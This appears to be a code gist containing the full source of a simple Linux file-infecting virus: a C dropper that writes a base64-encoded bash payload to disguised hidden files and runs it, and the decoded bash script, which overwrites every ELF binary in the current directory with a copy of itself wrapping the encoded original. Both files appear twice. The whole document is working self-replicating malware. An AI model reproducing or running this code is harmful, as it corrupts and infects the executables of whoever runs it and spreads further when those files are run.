fffonion/virus.c

## virus.c
#include <stdlib.h>
#include <stdio.h>
char payload[]="IyEvYmluL2Jhc2gKRD0wCkVOQz0iYmFzZTY0IC13IDAiCkRFQz0iYmFzZTY0IC1kIgoKZnVuY3Rpb24gZGJnICgpCnsKCWlmIFsgJEQgLWd0IDAgXTsgdGhlbgoJCWVjaG8gIltERUJVR10gJDI6ICIkMSAxPiYyCglmaQp9CgpmdW5jdGlvbiByYW5kb20gKCkKewoJaWYgWyAteiAiJDEiIF07IHRoZW4KCQlsZW49MTYKCWVsc2UKCQlsZW49JDEKCWZpCglfdD0kKGRkIGlmPS9kZXYvdXJhbmRvbSBvZj0vZGV2L3N0ZG91dCBicz0kbGVuIGNvdW50PTEgMj4vZGV2L251bGx8YmFzZTY0fHNlZCAicy9bXC9cK10vMC9nIikKCWVjaG8gJHtfdDowOiRsZW59Cn0KCgpmdW5jdGlvbiBnZXRfcGVybSAoKQp7CglpZiBbIC16ICIkMSIgXTsgdGhlbgoJCWRiZyAiTm8gZmlsZSBwYXRoIGdpdmVuIiAiZ2V0X3Blcm0iCgkJZWNobyAwCgllbHNlCgkJZWNobyAkKHN0YXQgLWMgIiVhIiAiJDEiIDI+JjEpCglmaQp9CgpmdW5jdGlvbiBzZXRfcGVybSgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXSB8fCBbIC16ICIkMiIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggb3Igbm8gcGVybSBnaXZlbiIgInNldF9wZXJtIgoJCWVjaG8gMgogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICQoY2htb2QgJDEgIiQyIiAyPi9kZXYvbnVsbCkKICAgICAgICBmaQp9CgoKZnVuY3Rpb24gZ2V0X3VnICgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggZ2l2ZW4iICJnZXRfcGVybSIKICAgICAgICAgICAgICAgIGVjaG8gMAogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgIGVjaG8gJChzdGF0IC1jICIlVTolRyIgIiQxIiAyPiYxKQogICAgICAgIGZpCQp9CgpmdW5jdGlvbiBlbmNfYmluYXJ5ICgpCnsKCWlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBnaXZlbiIgImVuY19iaW5hcnkiCiAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgZWNobyAkKGNhdCAiJDEiIHwkRU5DIDI+JjEpCiAgICAgICAgZmkKfQoKZnVuY3Rpb24gZGVjX2JpbmFyeSgpCnsKCWlmIFsgLXogIiQxIiBdIHx8IFsgLXogIiQyIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBvciBlbmNvZGVkIHBhcmFtIGdpdmVuIiAiZGVjX2JpbmFyeSIKICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBlY2hvICQyfCAkREVDIDI+L2Rldi9udWxsID4gIiQxIgogICAgICAgIGZpCn0KCmZ1bmN0aW9uIHNjYW5uZXIoKQp7CQoJcHRoPSQxCglmb3IgZiBpbiAkcHRoLyo7IGRvCgkJZGJnICJmb3VuZCAkZiIgc2Nhbm5lcgoJCWlmIFsgISAteiAkKGZpbGUgIiRmIiB8Z3JlcCAtb0UgRUxGKSBdICYmICEgW1sgIiRmIiA9PSAiLi92aXJ1cyIgXV07IHRoZW4KCQkJZGJnICJpbmZlY3RpbmcgJGYiIHNjYW5uZXIKCQkJX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCV9wZXJtPSQoZ2V0X3Blcm0gIiRmIikKCQkJX3VnPSQoZ2V0X3VnICIkZiIpCgkJCWRiZyAicGVybSAkX3Blcm0sIHVnICRfdWciIHNjYW5uZXIKCQkJaGVhZCAiJDAiIC1uMTAzID4gIiRmIgoJCQlfdGQ9Ii90bXAvc3NoLSIkKHJhbmRvbSAxMCkKCQkJZWNobyAibWtkaXIgJF90ZCAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJkZWNfYmluYXJ5IFwiJF90ZC8iJChiYXNlbmFtZSAiJGYiKSJcIiAkX3QiID4+ICIkZiIKCQkJZWNobyAiY2hvd24gJF91ZyBcIiRfdGQvJGZcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJjaG1vZCAkX3Blcm0gXCIkX3RkLyRmXCIgMj4vZGV2L251bGwiID4+ICIkZiIKCQkJZWNobyAiXCIkX3RkLyRmXCIgXCRAIiA+PiAiJGYiCgkJCWVjaG8gInJtIC1yZiBcIiRfdGRcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQkjX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCSNlY2hvICJlY2hvICRfdHwgJERFQyB8YmFzaCIgPiAiJGYiCgkJCWNob3duICRfdWcgIiRmIiAyPi9kZXYvbnVsbAoJCQljaG1vZCAkX3Blcm0gIiRmIiAyPi9kZXYvbnVsbAoJCWZpCglkb25lCQp9CgpzY2FubmVyIC4gMj4vZGV2L251bGwKZWNobyBIZWxsbyEgSSBhbSBhIHNpbXBsZSB2aXJ1cyEKCg==";
void main(){
	char cmd[3000]="/bin/bash";
	FILE *f = fopen(".vimcr", "w");
	if(f==NULL){exit(1);}
	fprintf(f, payload);
	fclose(f);
	system("cat .vimcr| base64 -d > .screencr && /bin/bash .screencr");
	unlink(".vimcr");
	unlink(".screencr");
}

## vul.sh
#!/bin/bash
D=0
ENC="base64 -w 0"
DEC="base64 -d"

function dbg ()
{
	if [ $D -gt 0 ]; then
		echo "[DEBUG] $2: "$1 1>&2
	fi
}

function random ()
{
	if [ -z "$1" ]; then
		len=16
	else
		len=$1
	fi
	_t=$(dd if=/dev/urandom of=/dev/stdout bs=$len count=1 2>/dev/null|base64|sed "s/[\/\+]/0/g")
	echo ${_t:0:$len}
}


function get_perm ()
{
	if [ -z "$1" ]; then
		dbg "No file path given" "get_perm"
		echo 0
	else
		echo $(stat -c "%a" "$1" 2>&1)
	fi
}

function set_perm()
{
        if [ -z "$1" ] || [ -z "$2" ]; then
                dbg "No file path or no perm given" "set_perm"
		echo 2
        else
                $(chmod $1 "$2" 2>/dev/null)
        fi
}


function get_ug ()
{
        if [ -z "$1" ]; then
                dbg "No file path given" "get_perm"
                echo 0
        else
                echo $(stat -c "%U:%G" "$1" 2>&1)
        fi
}

function enc_binary ()
{
	if [ -z "$1" ]; then
                dbg "No file path given" "enc_binary"
        else
                echo $(cat "$1" |$ENC 2>&1)
        fi
}

function dec_binary()
{
	if [ -z "$1" ] || [ -z "$2" ]; then
                dbg "No file path or encoded param given" "dec_binary"
        else
                echo $2| $DEC 2>/dev/null > "$1"
        fi
}

function scanner()
{
	pth=$1
	for f in $pth/*; do
		dbg "found $f" scanner
		if [ ! -z $(file "$f" |grep -oE ELF) ] && ! [[ "$f" == "./virus" ]]; then
			dbg "infecting $f" scanner
			_t=$(enc_binary "$f")
			_perm=$(get_perm "$f")
			_ug=$(get_ug "$f")
			dbg "perm $_perm, ug $_ug" scanner
			head "$0" -n103 > "$f"
			_td="/tmp/ssh-"$(random 10)
			echo "mkdir $_td 2>/dev/null" >> "$f"
			echo "dec_binary \"$_td/"$(basename "$f")"\" $_t" >> "$f"
			echo "chown $_ug \"$_td/$f\" 2>/dev/null" >> "$f"
			echo "chmod $_perm \"$_td/$f\" 2>/dev/null" >> "$f"
			echo "\"$_td/$f\" \$@" >> "$f"
			echo "rm -rf \"$_td\" 2>/dev/null" >> "$f"
			#_t=$(enc_binary "$f")
			#echo "echo $_t| $DEC |bash" > "$f"
			chown $_ug "$f" 2>/dev/null
			chmod $_perm "$f" 2>/dev/null
		fi
	done
}

scanner . 2>/dev/null
echo You're doomed!
	#include <stdlib.h>
	#include <stdio.h>
	char payload[]="IyEvYmluL2Jhc2gKRD0wCkVOQz0iYmFzZTY0IC13IDAiCkRFQz0iYmFzZTY0IC1kIgoKZnVuY3Rpb24gZGJnICgpCnsKCWlmIFsgJEQgLWd0IDAgXTsgdGhlbgoJCWVjaG8gIltERUJVR10gJDI6ICIkMSAxPiYyCglmaQp9CgpmdW5jdGlvbiByYW5kb20gKCkKewoJaWYgWyAteiAiJDEiIF07IHRoZW4KCQlsZW49MTYKCWVsc2UKCQlsZW49JDEKCWZpCglfdD0kKGRkIGlmPS9kZXYvdXJhbmRvbSBvZj0vZGV2L3N0ZG91dCBicz0kbGVuIGNvdW50PTEgMj4vZGV2L251bGx8YmFzZTY0fHNlZCAicy9bXC9cK10vMC9nIikKCWVjaG8gJHtfdDowOiRsZW59Cn0KCgpmdW5jdGlvbiBnZXRfcGVybSAoKQp7CglpZiBbIC16ICIkMSIgXTsgdGhlbgoJCWRiZyAiTm8gZmlsZSBwYXRoIGdpdmVuIiAiZ2V0X3Blcm0iCgkJZWNobyAwCgllbHNlCgkJZWNobyAkKHN0YXQgLWMgIiVhIiAiJDEiIDI+JjEpCglmaQp9CgpmdW5jdGlvbiBzZXRfcGVybSgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXSB8fCBbIC16ICIkMiIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggb3Igbm8gcGVybSBnaXZlbiIgInNldF9wZXJtIgoJCWVjaG8gMgogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgICQoY2htb2QgJDEgIiQyIiAyPi9kZXYvbnVsbCkKICAgICAgICBmaQp9CgoKZnVuY3Rpb24gZ2V0X3VnICgpCnsKICAgICAgICBpZiBbIC16ICIkMSIgXTsgdGhlbgogICAgICAgICAgICAgICAgZGJnICJObyBmaWxlIHBhdGggZ2l2ZW4iICJnZXRfcGVybSIKICAgICAgICAgICAgICAgIGVjaG8gMAogICAgICAgIGVsc2UKICAgICAgICAgICAgICAgIGVjaG8gJChzdGF0IC1jICIlVTolRyIgIiQxIiAyPiYxKQogICAgICAgIGZpCQp9CgpmdW5jdGlvbiBlbmNfYmluYXJ5ICgpCnsKCWlmIFsgLXogIiQxIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBnaXZlbiIgImVuY19iaW5hcnkiCiAgICAgICAgZWxzZQogICAgICAgICAgICAgICAgZWNobyAkKGNhdCAiJDEiIHwkRU5DIDI+JjEpCiAgICAgICAgZmkKfQoKZnVuY3Rpb24gZGVjX2JpbmFyeSgpCnsKCWlmIFsgLXogIiQxIiBdIHx8IFsgLXogIiQyIiBdOyB0aGVuCiAgICAgICAgICAgICAgICBkYmcgIk5vIGZpbGUgcGF0aCBvciBlbmNvZGVkIHBhcmFtIGdpdmVuIiAiZGVjX2JpbmFyeSIKICAgICAgICBlbHNlCiAgICAgICAgICAgICAgICBlY2hvICQyfCAkREVDIDI+L2Rldi9udWxsID4gIiQxIgogICAgICAgIGZpCn0KCmZ1bmN0aW9uIHNjYW5uZXIoKQp7CQoJcHRoPSQxCglmb3IgZiBpbiAkcHRoLyo7IGRvCgkJZGJnICJmb3VuZCAkZiIgc2Nhbm5lcgoJCWlmIFsgISAteiAkKGZpbGUgIiRmIiB8Z3JlcCAtb0UgRUxGKSBdICYmICEgW1sgIiRmIiA9PSAiLi92aXJ1cyIgXV07IHRoZW4KCQkJZGJnICJpbmZlY3RpbmcgJGYiIHNjYW5uZXIKCQkJX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCV9wZXJtPSQoZ2V0X3Blcm0gIiRmIikKCQkJX3VnPSQoZ2V0X3VnICIkZiIpCgkJCWRiZyAicGVybSAkX3Blcm0sIHVnICRfdWciIHNjYW5uZXIKCQkJaGVhZCAiJDAiIC1uMTAzID4gIiRmIgoJCQlfdGQ9Ii90bXAvc3NoLSIkKHJhbmRvbSAxMCkKCQkJZWNobyAibWtkaXIgJF90ZCAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJkZWNfYmluYXJ5IFwiJF90ZC8iJChiYXNlbmFtZSAiJGYiKSJcIiAkX3QiID4+ICIkZiIKCQkJZWNobyAiY2hvd24gJF91ZyBcIiRfdGQvJGZcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQllY2hvICJjaG1vZCAkX3Blcm0gXCIkX3RkLyRmXCIgMj4vZGV2L251bGwiID4+ICIkZiIKCQkJZWNobyAiXCIkX3RkLyRmXCIgXCRAIiA+PiAiJGYiCgkJCWVjaG8gInJtIC1yZiBcIiRfdGRcIiAyPi9kZXYvbnVsbCIgPj4gIiRmIgoJCQkjX3Q9JChlbmNfYmluYXJ5ICIkZiIpCgkJCSNlY2hvICJlY2hvICRfdHwgJERFQyB8YmFzaCIgPiAiJGYiCgkJCWNob3duICRfdWcgIiRmIiAyPi9kZXYvbnVsbAoJCQljaG1vZCAkX3Blcm0gIiRmIiAyPi9kZXYvbnVsbAoJCWZpCglkb25lCQp9CgpzY2FubmVyIC4gMj4vZGV2L251bGwKZWNobyBIZWxsbyEgSSBhbSBhIHNpbXBsZSB2aXJ1cyEKCg==";
	void main(){
	char cmd[3000]="/bin/bash";
	FILE *f = fopen(".vimcr", "w");
	if(f==NULL){exit(1);}
	fprintf(f, payload);
	fclose(f);
	system("cat .vimcr\| base64 -d > .screencr && /bin/bash .screencr");
	unlink(".vimcr");
	unlink(".screencr");
	}
	#!/bin/bash
	D=0
	ENC="base64 -w 0"
	DEC="base64 -d"

	function dbg ()
	{
	if [ $D -gt 0 ]; then
	echo "[DEBUG] $2: "$1 1>&2
	fi
	}

	function random ()
	{
	if [ -z "$1" ]; then
	len=16
	else
	len=$1
	fi
	_t=$(dd if=/dev/urandom of=/dev/stdout bs=$len count=1 2>/dev/null\|base64\|sed "s/[\/\+]/0/g")
	echo ${_t:0:$len}
	}


	function get_perm ()
	{
	if [ -z "$1" ]; then
	dbg "No file path given" "get_perm"
	echo 0
	else
	echo $(stat -c "%a" "$1" 2>&1)
	fi
	}

	function set_perm()
	{
	if [ -z "$1" ] \|\| [ -z "$2" ]; then
	dbg "No file path or no perm given" "set_perm"
	echo 2
	else
	$(chmod $1 "$2" 2>/dev/null)
	fi
	}


	function get_ug ()
	{
	if [ -z "$1" ]; then
	dbg "No file path given" "get_perm"
	echo 0
	else
	echo $(stat -c "%U:%G" "$1" 2>&1)
	fi
	}

	function enc_binary ()
	{
	if [ -z "$1" ]; then
	dbg "No file path given" "enc_binary"
	else
	echo $(cat "$1" \|$ENC 2>&1)
	fi
	}

	function dec_binary()
	{
	if [ -z "$1" ] \|\| [ -z "$2" ]; then
	dbg "No file path or encoded param given" "dec_binary"
	else
	echo $2\| $DEC 2>/dev/null > "$1"
	fi
	}

	function scanner()
	{
	pth=$1
	for f in $pth/*; do
	dbg "found $f" scanner
	if [ ! -z $(file "$f" \|grep -oE ELF) ] && ! [[ "$f" == "./virus" ]]; then
	dbg "infecting $f" scanner
	_t=$(enc_binary "$f")
	_perm=$(get_perm "$f")
	_ug=$(get_ug "$f")
	dbg "perm $_perm, ug $_ug" scanner
	head "$0" -n103 > "$f"
	_td="/tmp/ssh-"$(random 10)
	echo "mkdir $_td 2>/dev/null" >> "$f"
	echo "dec_binary \"$_td/"$(basename "$f")"\" $_t" >> "$f"
	echo "chown $_ug \"$_td/$f\" 2>/dev/null" >> "$f"
	echo "chmod $_perm \"$_td/$f\" 2>/dev/null" >> "$f"
	echo "\"$_td/$f\" \$@" >> "$f"
	echo "rm -rf \"$_td\" 2>/dev/null" >> "$f"
	#_t=$(enc_binary "$f")
	#echo "echo $_t\| $DEC \|bash" > "$f"
	chown $_ug "$f" 2>/dev/null
	chmod $_perm "$f" 2>/dev/null
	fi
	done
	}

	scanner . 2>/dev/null
	echo You're doomed!